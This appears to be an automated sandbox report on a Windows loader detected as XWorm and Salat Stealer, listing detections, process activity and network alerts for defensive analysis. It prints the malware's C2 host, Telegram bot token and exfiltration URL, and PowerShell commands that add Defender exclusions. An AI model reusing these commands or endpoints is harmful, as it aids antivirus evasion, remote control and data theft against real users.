Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KoaguarLoader.exe

Overview

General Information

Sample name:KoaguarLoader.exe
Analysis ID:1635431
MD5:17d315fd1070f02f6416bdbaef4013bf
SHA1:3788e9c037f8cced6641b54253ca3e85c06db794
SHA256:ba66581906649d65334d3e234825bd3e1dd9b57b3a77fad66c3e942e552b6a5b
Tags:exeXWormuser-aachum
Infos:

Detection

Salat Stealer, XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Salat Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • KoaguarLoader.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\KoaguarLoader.exe" MD5: 17D315FD1070F02F6416BDBAEF4013BF)
    • KoaguarLoader.exe (PID: 5744 cmdline: "C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe" MD5: FECE8E37429350B456E8E5555464B130)
      • I1y524I4zau1n3u.exe (PID: 3816 cmdline: "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe" MD5: FECE8E37429350B456E8E5555464B130)
    • svhost.exe (PID: 5248 cmdline: "C:\Users\user\AppData\Local\Temp\svhost.exe" MD5: 2A40AB34DCD3014E4EE93546DA6641D1)
      • powershell.exe (PID: 4732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7380 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7724 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • HkqNfKUrMBAD.exe (PID: 7336 cmdline: "C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe" MD5: FECE8E37429350B456E8E5555464B130)
  • I1y524I4zau1n3u.exe (PID: 7616 cmdline: "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe" MD5: FECE8E37429350B456E8E5555464B130)
  • svchost.exe (PID: 7860 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • HkqNfKUrMBAD.exe (PID: 7956 cmdline: "C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe" MD5: FECE8E37429350B456E8E5555464B130)
  • I1y524I4zau1n3u.exe (PID: 5908 cmdline: "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe" MD5: FECE8E37429350B456E8E5555464B130)
  • svhost.exe (PID: 5568 cmdline: "C:\Users\user\AppData\Roaming\svhost.exe" MD5: 2A40AB34DCD3014E4EE93546DA6641D1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["develop-oregon.gl.at.ply.gg"], "Port": 41793, "Aes key": "123456789", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7633754203:AAGdgIxVhns7RJswrsnNS4ilwSCe6ayObHQ", "Telegram Chatid": "1099820672", "Version": "XWorm V5.6"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7633754203:AAGdgIxVhns7RJswrsnNS4ilwSCe6ayObHQ/sendMessage"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
KoaguarLoader.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    KoaguarLoader.exeJoeSecurity_XWormYara detected XWormJoe Security
      KoaguarLoader.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
      • 0x32bff8:$str01: $VB$Local_Port
      • 0x32c025:$str02: $VB$Local_Host
      • 0x32a9d4:$str03: get_Jpeg
      • 0x32ae61:$str04: get_ServicePack
      • 0x32d67d:$str05: Select * from AntivirusProduct
      • 0x32de0d:$str06: PCRestart
      • 0x32de21:$str07: shutdown.exe /f /r /t 0
      • 0x32ded3:$str08: StopReport
      • 0x32dea9:$str09: StopDDos
      • 0x32df9f:$str10: sendPlugin
      • 0x32e01f:$str11: OfflineKeylogger Not Enabled
      • 0x32e159:$str12: -ExecutionPolicy Bypass -File "
      • 0x32e624:$str13: Content-length: 5235
      KoaguarLoader.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x32d1d5:$s6: VirtualBox
      • 0x32d133:$s8: Win32_ComputerSystem
      • 0x32e823:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x32e8c0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x32e9d5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x32e53f:$cnc4: POST / HTTP/1.1

      PCAP (Network Traffic)

      SourceRuleDescriptionAuthorStrings
      sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Temp\svhost.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
          C:\Users\user\AppData\Local\Temp\svhost.exeJoeSecurity_XWormYara detected XWormJoe Security
            C:\Users\user\AppData\Local\Temp\svhost.exeAndromeda_MalBot_Jun_1ADetects a malicious Worm Andromeda / RETADUPFlorian Roth
            • 0xe1c9:$s1: 4System.Web.Services.Protocols.SoapHttpClientProtocol
            • 0xebf8:$s2: svhost.exe
            • 0xec60:$s2: svhost.exe
            C:\Users\user\AppData\Local\Temp\svhost.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0xaf64:$str01: $VB$Local_Port
            • 0xaf91:$str02: $VB$Local_Host
            • 0x9940:$str03: get_Jpeg
            • 0x9dcd:$str04: get_ServicePack
            • 0xc5e9:$str05: Select * from AntivirusProduct
            • 0xcd79:$str06: PCRestart
            • 0xcd8d:$str07: shutdown.exe /f /r /t 0
            • 0xce3f:$str08: StopReport
            • 0xce15:$str09: StopDDos
            • 0xcf0b:$str10: sendPlugin
            • 0xcf8b:$str11: OfflineKeylogger Not Enabled
            • 0xd0c5:$str12: -ExecutionPolicy Bypass -File "
            • 0xd590:$str13: Content-length: 5235
            C:\Users\user\AppData\Local\Temp\svhost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xc141:$s6: VirtualBox
            • 0xc09f:$s8: Win32_ComputerSystem
            • 0xd78f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xd82c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xd941:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xd4ab:$cnc4: POST / HTTP/1.1
            Click to see the 5 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xbf39:$s6: VirtualBox
                • 0x1b151:$s6: VirtualBox
                • 0xbe97:$s8: Win32_ComputerSystem
                • 0x1b0af:$s8: Win32_ComputerSystem
                • 0xd587:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x1c79f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xd624:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x1c83c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xd739:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x1c951:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xd2a3:$cnc4: POST / HTTP/1.1
                • 0x1c4bb:$cnc4: POST / HTTP/1.1
                00000010.00000002.1215210538.0000000000EDD000.00000040.00000001.01000000.0000000C.sdmpJoeSecurity_SalatStealerYara detected Salat StealerJoe Security
                  00000017.00000001.1289075938.0000000000291000.00000040.00000001.01000000.00000009.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 28 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    3.2.svhost.exe.31e05f0.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      3.2.svhost.exe.31e05f0.0.unpackAndromeda_MalBot_Jun_1ADetects a malicious Worm Andromeda / RETADUPFlorian Roth
                      • 0xc3c9:$s1: 4System.Web.Services.Protocols.SoapHttpClientProtocol
                      • 0xcdf8:$s2: svhost.exe
                      • 0xce60:$s2: svhost.exe
                      • 0xd47c:$s2: svhost.exe
                      • 0xd4ec:$s2: svhost.exe
                      3.2.svhost.exe.31e05f0.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                      • 0x9164:$str01: $VB$Local_Port
                      • 0x9191:$str02: $VB$Local_Host
                      • 0x7b40:$str03: get_Jpeg
                      • 0x7fcd:$str04: get_ServicePack
                      • 0xa7e9:$str05: Select * from AntivirusProduct
                      • 0xaf79:$str06: PCRestart
                      • 0xaf8d:$str07: shutdown.exe /f /r /t 0
                      • 0xb03f:$str08: StopReport
                      • 0xb015:$str09: StopDDos
                      • 0xb10b:$str10: sendPlugin
                      • 0xb18b:$str11: OfflineKeylogger Not Enabled
                      • 0xb2c5:$str12: -ExecutionPolicy Bypass -File "
                      • 0xb790:$str13: Content-length: 5235
                      3.2.svhost.exe.31e05f0.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0xa341:$s6: VirtualBox
                      • 0xa29f:$s8: Win32_ComputerSystem
                      • 0xb98f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0xba2c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0xbb41:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0xb6ab:$cnc4: POST / HTTP/1.1
                      0.3.KoaguarLoader.exe.a5f010.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                        Click to see the 42 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svhost.exe, ParentProcessId: 5248, ParentProcessName: svhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', ProcessId: 4732, ProcessName: powershell.exe
                        Sigma detected: Script Interpreter Execution From Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svhost.exe, ParentProcessId: 5248, ParentProcessName: svhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', ProcessId: 4732, ProcessName: powershell.exe
                        Sigma detected: Suspicious Script Execution From Temp Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svhost.exe, ParentProcessId: 5248, ParentProcessName: svhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', ProcessId: 4732, ProcessName: powershell.exe
                        Sigma detected: Change PowerShell Policies to an Insecure Level
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svhost.exe, ParentProcessId: 5248, ParentProcessName: svhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', ProcessId: 4732, ProcessName: powershell.exe
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe, ProcessId: 5744, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HkqNfKUrMBAD
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svhost.exe, ParentProcessId: 5248, ParentProcessName: svhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', ProcessId: 4732, ProcessName: powershell.exe
                        Sigma detected: Startup Folder File Write
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\svhost.exe, ProcessId: 5248, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svhost.exe, ParentProcessId: 5248, ParentProcessName: svhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe', ProcessId: 4732, ProcessName: powershell.exe
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7860, ProcessName: svchost.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-11T17:12:32.762679+010028536851A Network Trojan was detected192.168.2.849702149.154.167.220443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-11T17:13:20.340127+010028533711Malware Command and Control Activity Detected192.168.2.849705147.185.221.2541793TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-11T17:12:32.762679+010018100071Potentially Bad Traffic192.168.2.849702149.154.167.220443TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: KoaguarLoader.exeAvira: detected
                        Source: KoaguarLoader.exeAvira: detected
                        Antivirus detection for URL or domain
                        Source: https://sa1at.ru/sa1at/Avira URL Cloud: Label: malware
                        Source: https://sa1at.ru/sa1at/RepetitionDurationIntervalEndBoundaryRepetitionDurationInterval2025-03-11T12:Avira URL Cloud: Label: malware
                        Source: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/Avira URL Cloud: Label: malware
                        Source: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html;Avira URL Cloud: Label: malware
                        Source: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/Avira URL Cloud: Label: malware
                        Source: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/etext/htAvira URL Cloud: Label: malware
                        Source: develop-oregon.gl.at.ply.ggAvira URL Cloud: Label: malware
                        Source: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/htmAvira URL Cloud: Label: malware
                        Source: https://sa1at.ru/sa1at/etext/html;Avira URL Cloud: Label: malware
                        Source: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://Avira URL Cloud: Label: malware
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeAvira: detection malicious, Label: TR/AD.GenSteal.qhukd
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeAvira: detection malicious, Label: TR/AD.GenSteal.qhukd
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeAvira: detection malicious, Label: TR/AD.GenSteal.qhukd
                        Source: C:\Users\user\AppData\Roaming\svhost.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                        Found malware configuration
                        Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["develop-oregon.gl.at.ply.gg"], "Port": 41793, "Aes key": "123456789", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7633754203:AAGdgIxVhns7RJswrsnNS4ilwSCe6ayObHQ", "Telegram Chatid": "1099820672", "Version": "XWorm V5.6"}
                        Source: svhost.exe.5248.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7633754203:AAGdgIxVhns7RJswrsnNS4ilwSCe6ayObHQ/sendMessage"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeReversingLabs: Detection: 79%
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeReversingLabs: Detection: 79%
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeReversingLabs: Detection: 79%
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeReversingLabs: Detection: 91%
                        Source: C:\Users\user\AppData\Roaming\svhost.exeReversingLabs: Detection: 91%
                        Multi AV Scanner detection for submitted file
                        Source: KoaguarLoader.exeVirustotal: Detection: 87%Perma Link
                        Source: KoaguarLoader.exeReversingLabs: Detection: 94%
                        Joe Sandbox ML detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Sample uses string decryption to hide its real strings
                        Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmpString decryptor: develop-oregon.gl.at.ply.gg
                        Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmpString decryptor: 41793
                        Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmpString decryptor: 123456789
                        Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
                        Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmpString decryptor: XWorm V5.6
                        Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
                        Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmpString decryptor: %AppData%
                        Source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmpString decryptor: svhost.exe
                        Source: KoaguarLoader.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
